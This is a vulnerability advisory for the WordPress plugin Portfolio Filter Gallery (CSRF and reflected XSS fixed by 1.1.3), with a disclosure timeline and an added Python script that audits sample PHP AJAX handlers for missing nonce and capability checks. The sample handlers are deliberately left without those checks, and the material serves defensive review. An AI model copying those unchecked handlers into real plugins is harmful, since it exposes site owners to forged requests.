WordPress Plugin Vulnerabilities
Portfolio Filter Gallery < 1.1.3 - CSRF & Reflected XSS
Description
Lack of CSRF checks on the Filters page could allow attackers to add/edit/update/delete categories and delete all categories, as well as perform reflected XSS attacks.
v1.0.8 fixed the reflected XSS; however, there was still no CSRF check on the delete and delete_all_category actions
v1.1.0 released, no additional fix
v1.1.1 released, no additional fix
January 3rd, 2020 - Vendor contacted about lack of CSRF checks
January 4th, 2020 - Vendor Acknowledgment
January 7th, 2020 - v1.1.2 Released, no fix
January 14th, 2020 - Vendor contacted for updates. Responded that the plugin will be updated after "2 days holidays" (whatever that means)
January 22nd, 2020 - Still no updates, escalated to WP plugin team.
January 27th, 2020 - v1.1.3 released, fixing the remaining CSRF issues. Capability checks are missing from AJAX calls though, but I give up on this one.
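The two gaps this entry tracks (state-changing actions without a CSRF nonce check, and AJAX calls without a capability check) can be looked for during a plugin code review. The following is an added example, not code from the plugin or from this advisory: a small Python audit that lists `wp_ajax_` handlers whose callback body calls neither a WordPress nonce function nor `current_user_can()`. The PHP sample and every `demo_*` name in it are constructed for illustration.

```python
import re

# Constructed sample plugin source; handler and option names are hypothetical.
SAMPLE_PHP = r"""
add_action('wp_ajax_demo_delete_category', 'demo_delete_category');
function demo_delete_category() {              // no nonce, no capability check
    delete_option('demo_cat_' . intval($_POST['id']));
    wp_die();
}
add_action('wp_ajax_demo_delete_all', 'demo_delete_all');
function demo_delete_all() {                   // CSRF fixed, any logged-in user may call
    check_ajax_referer('demo_delete_all');
    delete_option('demo_categories');
    wp_die();
}
add_action('wp_ajax_demo_save_category', 'demo_save_category');
function demo_save_category() {                // both checks present
    check_ajax_referer('demo_save_category');
    if (!current_user_can('manage_options')) { wp_die('Forbidden', 403); }
    update_option('demo_category', sanitize_text_field($_POST['name']));
    wp_die();
}
"""

HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_ajax_(?:nopriv_)?(\w+)['\"]\s*,\s*['\"](\w+)['\"]")
CHECKS = {  # WordPress core functions that implement each control
    "nonce": ("check_ajax_referer", "check_admin_referer", "wp_verify_nonce"),
    "capability": ("current_user_can",),
}

def function_body(src, name):
    """Return the text between the braces of PHP function `name`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:              # walk to the matching closing brace
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """Map each AJAX action to the controls its callback never calls."""
    findings = {}
    for action, callback in HOOK_RE.findall(src):
        body = function_body(src, callback) or ""
        missing = [k for k, calls in CHECKS.items() if not any(c + "(" in body for c in calls)]
        if missing:
            findings[action] = missing
    return findings
```

This is a text-level heuristic: a check performed inside a helper function, or braces inside PHP string literals, will produce false results, so treat each finding as a prompt for manual review.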